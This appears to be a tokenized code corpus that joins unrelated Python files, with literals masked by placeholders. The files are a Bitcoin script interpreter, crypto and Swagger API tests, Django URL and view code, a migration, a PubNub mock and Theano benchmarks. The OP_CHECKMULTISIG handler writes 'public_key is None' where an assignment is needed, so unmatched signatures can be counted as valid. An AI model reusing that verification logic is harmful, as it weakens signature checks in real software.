<EOL> n = stack . pop ( ) . value + <NUM_LIT:1> <EOL> if not ( <NUM_LIT:0> <= n <= len ( stack ) ) : return False <EOL> stack . append ( stack [ - n ] ) <EOL> elif opcode == opcodes . OP_ROLL : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> n = stack . pop ( ) . value + <NUM_LIT:1> <EOL> if not ( <NUM_LIT:0> <= n <= len ( stack ) ) : return False <EOL> stack . append ( stack . pop ( - n ) ) <EOL> elif opcode == opcodes . OP_ROT : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 : [ x2 , x3 , x1 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SWAP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x2 , x1 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_TUCK : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x2 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2DROP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2DUP : <EOL> if not _stack_op ( stack , lambda x1 , x2 : [ x1 , x2 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_3DUP : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 : [ x1 , x2 , x3 , x1 , x2 , x3 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2OVER : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 , x4 : [ x1 , x2 , x3 , x4 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2ROT : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 , x4 , x5 , x6 : [ x3 , x4 , x5 , x6 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_2SWAP : <EOL> if not _stack_op ( stack , lambda x1 , x2 , x3 , x4 : [ x3 , x4 , x1 , x2 ] ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SIZE : <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> stack . append ( ByteVector . from_value ( len ( stack [ - <NUM_LIT:1> ] ) ) ) <EOL> elif opcode == opcodes . OP_EQUAL : <EOL> if not _math_op ( stack , lambda x1 , x2 : bool ( x1 == x2 ) , False ) : <EOL> return False <EOL> elif opcode == opcodes . OP_1ADD : <EOL> if not _math_op ( stack , lambda a : a + One ) : <EOL> return False <EOL> elif opcode == opcodes . OP_1SUB : <EOL> if not _math_op ( stack , lambda a : a - One ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NEGATE : <EOL> if not _math_op ( stack , lambda a : - a ) : <EOL> return False <EOL> elif opcode == opcodes . OP_ABS : <EOL> if not _math_op ( stack , lambda a : abs ( a ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NOT : <EOL> if not _math_op ( stack , lambda a : bool ( a == <NUM_LIT:0> ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_0NOTEQUAL : <EOL> if not _math_op ( stack , lambda a : bool ( a != <NUM_LIT:0> ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_ADD : <EOL> if not _math_op ( stack , lambda a , b : a + b ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SUB : <EOL> if not _math_op ( stack , lambda a , b : a - b ) : <EOL> return False <EOL> elif opcode == opcodes . OP_BOOLAND : <EOL> if not _math_op ( stack , lambda a , b : bool ( a and b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_BOOLOR : <EOL> if not _math_op ( stack , lambda a , b : bool ( a or b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NUMEQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a == b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_NUMNOTEQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a != b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_LESSTHAN : <EOL> if not _math_op ( stack , lambda a , b : bool ( a < b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_GREATERTHAN : <EOL> if not _math_op ( stack , lambda a , b : bool ( a > b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_LESSTHANOREQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a <= b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_GREATERTHANOREQUAL : <EOL> if not _math_op ( stack , lambda a , b : bool ( a >= b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_MIN : <EOL> if not _math_op ( stack , lambda a , b : min ( a , b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_MAX : <EOL> if not _math_op ( stack , lambda a , b : max ( a , b ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_WITHIN : <EOL> if not _math_op ( stack , lambda x , omin , omax : bool ( omin <= x < omax ) ) : <EOL> return False <EOL> elif opcode == opcodes . OP_RIPEMD160 : <EOL> if not _hash_op ( stack , util . ripemd160 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SHA1 : <EOL> if not _hash_op ( stack , util . sha1 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_SHA256 : <EOL> if not _hash_op ( stack , util . sha256 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_HASH160 : <EOL> if not _hash_op ( stack , util . hash160 ) : <EOL> return False <EOL> elif opcode == opcodes . OP_HASH256 : <EOL> if not _hash_op ( stack , util . sha256d ) : <EOL> return False <EOL> elif opcode == opcodes . OP_CODESEPARATOR : <EOL> if pc > last_codeseparator : <EOL> last_codeseparator = pc <EOL> elif opcode == opcodes . OP_CHECKSIG : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> def filter ( opcode , bytes , value ) : <EOL> if opcode == opcodes . OP_CODESEPARATOR : <EOL> return False <EOL> if opcode == Tokenizer . OP_LITERAL and isinstance ( value , str ) and value == signature : <EOL> return False <EOL> return True <EOL> subscript = tokens . get_subscript ( last_codeseparator , filter ) <EOL> public_key = stack . pop ( ) . vector <EOL> signature = stack . pop ( ) . vector <EOL> valid = check_signature ( signature , public_key , hash_type , subscript , transaction , input_index ) <EOL> if valid : <EOL> stack . append ( One ) <EOL> else : <EOL> stack . append ( Zero ) <EOL> elif opcode == opcodes . OP_CHECKMULTISIG : <EOL> if len ( stack ) < <NUM_LIT:2> : return False <EOL> count = stack . pop ( ) . value <EOL> if len ( stack ) < count : return False <EOL> public_keys = [ stack . pop ( ) for i in xrange ( count ) ] <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> count = stack . pop ( ) . value <EOL> if len ( stack ) < count : return False <EOL> signatures = [ stack . pop ( ) for i in xrange ( count ) ] <EOL> if len ( stack ) < <NUM_LIT:1> : return False <EOL> stack . pop ( ) <EOL> def filter ( opcode , bytes , value ) : <EOL> if opcode == opcodes . OP_CODESEPARATOR : <EOL> return False <EOL> if opcode == Tokenizer . OP_LITERAL and isinstance ( value , str ) and value in signatures : <EOL> return False <EOL> return True <EOL> subscript = tokens . get_subscript ( last_codeseparator , filter ) <EOL> matched = dict ( ) <EOL> for signature in signatures : <EOL> for public_key in public_keys : <EOL> if check_signature ( signature , public_key , hash_type , subscript , transaction , input_index ) : <EOL> break <EOL> else : <EOL> public_key is None <EOL> if public_key is not None : <EOL> matched [ signature ] = public_key <EOL> public_keys . remove ( public_key ) <EOL> if len ( matched ) == len ( signatures ) : <EOL> stack . append ( One ) <EOL> else : <EOL> stack . append ( Zero ) <EOL> elif opcode == opcodes . OP_RESERVED : <EOL> return False <EOL> elif opcode == opcodes . OP_VER : <EOL> return False <EOL> elif opcode == opcodes . OP_RESERVED1 : <EOL> return False <EOL> elif opcode == opcodes . OP_RESERVED2 : <EOL> return False <EOL> elif opcodes . OP_NOP1 <= opcode <= opcodes . OP_NOP10 : <EOL> pass <EOL> else : <EOL> return False <EOL> if len ( stack ) and bool ( stack [ - <NUM_LIT:1> ] ) : <EOL> return True <EOL> return False </s>
<s> import unittest <EOL> import pycoind <EOL> class TestEllipticCurveCrypto ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def test_shared_secret ( self ) : <EOL> a = pycoind . wallet . Address . generate ( ) <EOL> b = pycoind . wallet . Address . generate ( ) <EOL> secret_ab = pycoind . util . ecc . shared_secret ( a . public_key , b . private_key ) <EOL> secret_ba = pycoind . util . ecc . shared_secret ( b . public_key , a . private_key ) <EOL> self . assertTrue ( secret_ab == secret_ba ) <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( TestEllipticCurveCrypto ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls . defaults import * <EOL> import django . views . defaults <EOL> from django . views . generic . base import RedirectView <EOL> from codereview import feeds <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT:index>' ) , <EOL> ( r'<STR_LIT>' , RedirectView . as_view ( url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> RedirectView . as_view ( url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT:image>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> django . views . defaults . page_not_found , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> django . views . defaults . page_not_found , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT:description>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> urlpatterns += patterns ( <EOL> '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> urlpatterns += patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , feeds . AllFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . MineFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . ReviewsFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . ClosedFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . OneIssueFeed ( ) , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import httplib <EOL> import json <EOL> import unittest <EOL> from swagger import Swagger <EOL> class SwaggerTestCast ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . client = Swagger . load ( '<STR_LIT>' ) <EOL> self . data = { <EOL> '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT:name>' : '<STR_LIT:string>' , <EOL> } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT:string>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT:name>' : '<STR_LIT:string>' , <EOL> } <EOL> ] , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> } <EOL> @ property <EOL> def pet ( self ) : <EOL> data = json . dumps ( self . data ) <EOL> res = self . client . post ( '<STR_LIT>' , body = data , auth = '<STR_LIT>' ) <EOL> return res . json ( ) <EOL> def test_swagger_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . Version , '<STR_LIT>' ) <EOL> def test_set_headers ( self ) : <EOL> pass <EOL> def test_swagger_default_scheme ( self ) : <EOL> self . assertEqual ( self . client . DefaultScheme , '<STR_LIT:http>' ) <EOL> def test_create_pet_endpoint ( self ) : <EOL> data = json . dumps ( self . data ) <EOL> expected_url = '<STR_LIT>' <EOL> res = self . client . post ( '<STR_LIT>' , body = data , auth = '<STR_LIT>' ) <EOL> self . assertEqual ( res . url , expected_url ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , dict ) ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> def test_get_pet_by_id_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . get ( '<STR_LIT>' , petId = petId ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> def test_find_pets_by_status_endpoint ( self ) : <EOL> statuses = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> for status in statuses : <EOL> res = self . client . get ( '<STR_LIT>' , status = status ) <EOL> expected_url = ( <EOL> '<STR_LIT>' <EOL> ) . format ( status ) <EOL> self . assertEqual ( res . url , expected_url ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , list ) ) <EOL> def test_find_pets_by_tags_endpoint ( self ) : <EOL> tags = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> tags = '<STR_LIT:U+002CU+0020>' . join ( [ tag for tag in tags ] ) <EOL> res = self . client . get ( '<STR_LIT>' , tags = tags ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , list ) ) <EOL> def test_find_pet_by_id_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . get ( '<STR_LIT>' , petId = petId ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , dict ) ) <EOL> def test_pet_update_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . post ( '<STR_LIT>' , petId = petId , name = '<STR_LIT:foo>' , <EOL> status = '<STR_LIT:bar>' , <EOL> format = '<STR_LIT>' ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> def test_delete_pet_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . delete ( '<STR_LIT>' , petId = petId , <EOL> auth = '<STR_LIT>' ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) </s>
<s> from django . template . defaultfilters import striptags <EOL> from django . template . defaultfilters import truncatewords <EOL> from django . views import generic <EOL> import social_metadata . views <EOL> from blog import models <EOL> class HomeView ( generic . ListView ) : <EOL> def get_queryset ( self ) : <EOL> return models . Post . objects . all ( ) . order_by ( '<STR_LIT>' ) <EOL> home_view = HomeView . as_view ( ) <EOL> class PostView ( social_metadata . views . SocialDataMixin , generic . DetailView ) : <EOL> model = models . Post <EOL> def get_social_title ( self ) : <EOL> return self . object . title <EOL> def get_social_images ( self ) : <EOL> yield self . object . cover_image . url <EOL> def get_social_description ( self ) : <EOL> return truncatewords ( striptags ( self . object . text ) , <NUM_LIT:50> ) <EOL> post_view = PostView . as_view ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . utils . timezone import utc <EOL> import datetime <EOL> class Migration ( migrations . Migration ) : <EOL> replaces = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> dependencies = [ <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:title>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:text>' , models . TextField ( default = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True , default = datetime . datetime ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , tzinfo = utc ) ) ) , <EOL> ] , <EOL> ) , <EOL> ] </s>
<s> from . . core import Observable <EOL> class PubnubMock ( Observable ) : <EOL> def __init__ ( self ) : <EOL> Observable . __init__ ( self ) <EOL> def subscribe ( self , channel , callback = None , error = None , connect = None , reconnect = None , disconnect = None ) : <EOL> self . on ( '<STR_LIT:message>' , callback ) <EOL> def unsubscribe ( self , channel ) : <EOL> pass <EOL> def receive_message ( self , message ) : <EOL> self . emit ( '<STR_LIT:message>' , message ) </s>
<s> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> import numpy <EOL> import sys <EOL> import time <EOL> import theano <EOL> import theano . tensor as T <EOL> import theano . sandbox <EOL> from six . moves import xrange <EOL> from theano . compile import module , Mode , ProfileMode <EOL> from theano import gof , Op , Apply <EOL> from theano . tensor import blas , opt <EOL> if <NUM_LIT:0> : <EOL> class Opt ( object ) : <EOL> merge = theano . gof . MergeOptimizer ( ) <EOL> gemm_opt_1 = theano . gof . TopoOptimizer ( theano . tensor_opt . gemm_pattern_1 ) <EOL> gemm_opt_2 = theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( <EOL> T . sub_inplace , <EOL> '<STR_LIT:d>' , <EOL> ( <EOL> T . mul , <EOL> dict ( pattern = ( T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , inplace = True ) , '<STR_LIT:a>' ) , <EOL> allow_multiple_clients = True ) , <EOL> ( <EOL> T . add , <EOL> ( T . dot , '<STR_LIT:b>' , '<STR_LIT:c>' ) , <EOL> ( T . transpose_inplace , ( T . dot , '<STR_LIT:f>' , '<STR_LIT:g>' ) ) <EOL> ) <EOL> ) <EOL> ) , <EOL> ( <EOL> T . gemm , <EOL> ( <EOL> T . gemm , <EOL> '<STR_LIT:d>' , <EOL> ( T . neg , '<STR_LIT:a>' ) , <EOL> ( T . transpose_inplace , '<STR_LIT:g>' ) , <EOL> ( T . transpose_inplace , '<STR_LIT:f>' ) , <EOL> T . constant ( <NUM_LIT:1.0> ) <EOL> ) , <EOL> ( T . neg , '<STR_LIT:a>' ) , <EOL> '<STR_LIT:b>' , <EOL> '<STR_LIT:c>' , <EOL> T . constant ( <NUM_LIT:1.0> ) <EOL> ) , <EOL> allow_multiple_clients = False ) ) <EOL> sqr = [ ] <EOL> sqr . append ( theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . mul , '<STR_LIT:x>' , '<STR_LIT:x>' ) , <EOL> ( T . sqr , '<STR_LIT:x>' ) , allow_multiple_clients = True ) ) ) <EOL> sqr . append ( theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . pow , '<STR_LIT:x>' , ( T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , inplace = True ) , T . constant ( <NUM_LIT:2> ) ) ) , <EOL> ( T . sqr , '<STR_LIT:x>' ) , allow_multiple_clients = True ) ) ) <EOL> ident_opt_list = [ ] <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . tensor_copy , '<STR_LIT:x>' ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . transpose_inplace , ( T . transpose_inplace , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . sqr , ( T . sqrt , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . sqrt , ( T . sqr , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . mul , '<STR_LIT:x>' , ( T . div , '<STR_LIT:y>' , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:y>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . mul , ( T . div , '<STR_LIT:y>' , '<STR_LIT:x>' ) , '<STR_LIT:x>' ) , <EOL> '<STR_LIT:y>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . div , ( T . mul , '<STR_LIT:y>' , '<STR_LIT:x>' ) , '<STR_LIT:x>' ) , <EOL> '<STR_LIT:y>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . div , ( T . mul , '<STR_LIT:y>' , '<STR_LIT:x>' ) , '<STR_LIT:y>' ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> def __call__ ( self , env ) : <EOL> self . merge ( env ) <EOL> if <NUM_LIT:0> : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> for opt in self . ident_opt_list : <EOL> opt ( env ) <EOL> for opt in self . sqr : <EOL> opt ( env ) <EOL> self . gemm_opt_1 ( env ) <EOL> self . gemm_opt_2 ( env ) <EOL> self . merge ( env ) <EOL> def print_graph_linker ( print_prog = True ) : <EOL> if <NUM_LIT:1> : <EOL> imap = { None : '<STR_LIT:->' } <EOL> def blah ( i , node , thunk ) : <EOL> imap [ node ] = str ( i ) <EOL> if print_prog : <EOL> if False and node . op == T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , inplace = True ) : <EOL> print ( node . op == T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , <EOL> inplace = True ) , end = '<STR_LIT:U+0020>' ) <EOL> print ( node . inputs [ <NUM_LIT:0> ] , type ( node . inputs [ <NUM_LIT:0> ] ) , end = '<STR_LIT:U+0020>' ) <EOL> print ( node . inputs [ <NUM_LIT:0> ] . equals ( T . constant ( <NUM_LIT:2> ) ) , end = '<STR_LIT:U+0020>' ) <EOL> outputs = node . outputs <EOL> inputs = theano . gof . graph . inputs ( outputs ) <EOL> print ( '<STR_LIT>' , i , node , end = '<STR_LIT:U+0020>' ) <EOL> print ( '<STR_LIT::>' . join ( [ imap [ inp . owner ] for inp in node . inputs ] ) ) <EOL> return theano . sandbox . wraplinker . WrapLinkerMany ( <EOL> [ theano . gof . OpWiseCLinker ( ) ] , <EOL> [ theano . sandbox . wraplinker . run_all <EOL> , blah <EOL> ] ) <EOL> else : <EOL> return theano . gof . OpWiseCLinker ( ) <EOL> class M ( module . Module ) : <EOL> def __init__ ( self ) : <EOL> super ( M , self ) . __init__ ( ) <EOL> x = T . matrix ( '<STR_LIT:x>' ) <EOL> self . w = module . Member ( T . matrix ( '<STR_LIT:w>' ) ) <EOL> self . a = module . Member ( T . vector ( '<STR_LIT:a>' ) ) <EOL> self . b = module . Member ( T . vector ( '<STR_LIT:b>' ) ) <EOL> self . hid = T . tanh ( T . dot ( x , self . w ) + self . a ) <EOL> hid = self . hid <EOL> self . out = T . tanh ( T . dot ( hid , self . w . T ) + self . b ) <EOL> out = self . out <EOL> self . err = <NUM_LIT:0.5> * T . sum ( ( out - x ) ** <NUM_LIT:2> ) <EOL> err = self . err <EOL> params = [ self . w , self . a , self . b ] <EOL> gparams = T . grad ( err , params ) <EOL> updates = [ ( p , p - <NUM_LIT> * gp ) for p , gp in zip ( params , gparams ) ] <EOL> self . step = module . Method ( [ x ] , err , updates = dict ( updates ) ) <EOL> mod = M ( ) <EOL> mode = '<STR_LIT>' <EOL> mode = Mode ( optimizer = '<STR_LIT>' , linker = theano . gof . OpWiseCLinker ( nice_errors = True ) ) <EOL> mode = Mode ( optimizer = '<STR_LIT>' , linker = '<STR_LIT:c>' ) <EOL> mode = Mode ( optimizer = '<STR_LIT>' , linker = '<STR_LIT>' ) <EOL> print ( mod . pretty ( mode = mode ) ) <EOL> m = mod . make ( mode = mode ) <EOL> neg , nout , nhid , niter = [ int ( a ) for a in sys . argv [ <NUM_LIT:1> : ] ] <EOL> rng = numpy . random . RandomState ( <NUM_LIT> ) <EOL> m . w = rng . rand ( nout , nhid ) <EOL> m . a = rng . randn ( nhid ) * <NUM_LIT:0.0> <EOL> m . b = rng . randn ( nout ) * <NUM_LIT:0.0> <EOL> x = ( rng . rand ( neg , nout ) - <NUM_LIT:0.5> ) * <NUM_LIT> <EOL> t = time . time ( ) <EOL> for i in xrange ( niter ) : <EOL> err = m . step ( x ) <EOL> print ( '<STR_LIT>' , time . time ( ) - t , '<STR_LIT>' , err ) <EOL> try : <EOL> mode . print_summary ( ) <EOL> pass <EOL> except : <EOL> pass </s>
<s> import numpy <EOL> import theano <EOL> x , y , z = theano . tensor . vectors ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x , y , z ] , [ ( x + y + z ) * <NUM_LIT:2> ] ) <EOL> xv = numpy . random . rand ( <NUM_LIT:10> ) . astype ( theano . config . floatX ) <EOL> yv = numpy . random . rand ( <NUM_LIT:10> ) . astype ( theano . config . floatX ) <EOL> zv = numpy . random . rand ( <NUM_LIT:10> ) . astype ( theano . config . floatX ) <EOL> f ( xv , yv , zv ) </s>
